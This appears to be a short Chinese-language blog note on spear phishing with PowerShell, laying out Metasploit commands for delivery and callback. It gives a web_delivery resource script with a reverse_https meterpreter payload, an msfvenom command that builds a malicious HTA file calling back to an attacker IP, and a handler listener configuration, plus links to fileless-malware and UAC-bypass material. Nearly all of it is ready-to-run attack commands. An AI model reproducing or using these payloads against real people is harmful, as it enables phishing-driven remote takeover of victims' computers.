Spear Phishing with Powershell Day 2

教程

参考视频[1] 和 [2]。

其他参考资料
youtube 关键词 metasploit powershell

64位payload

1
windows/x64/meterpreter/reverse_https

Web Delivery

用法 msfconsole -r powershell_web_delivery.rc

1
2
3
4
5
6
7
8
9
//powershell_web_delivery.rc
use exploit/multi/script/web_delivery
set target 2
set SRVPORT 8081
set LPORT 443
set LHOST 123.123.123.123
set PAYLOAD windows/x64/meterpreter/reverse_https
set ExitOnSession false
exploit -j

msfvenom HTA

生成HTA文件

1
msfvenom -p windows/meterpreter/reverse_tcp lhost=121.121.212.112 lport=8081 -f hta-psh -o test.hta

服务端配置

1
2
3
4
5
6
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 121.121.21.112
set LPORT 8081
set ExitOnSession false
exploit -j

web_delivery问题

浏览器可以下载powershell脚本。
powershell中无法下载,无法连接到服务器。

无文件 malware

60字节 - Powershell 无文件渗透测试实验
http://paper.seebug.org/243/

参考资料

[1] Meterpreter via PowerShell Payload + UAC Bypass on Windows 7

[2] Kali Linux 2.0: How To Control PC With A Powershell - Metasploit

[3] 小众工具 Kalista

[4] 我有两把枪:Powershell + HTA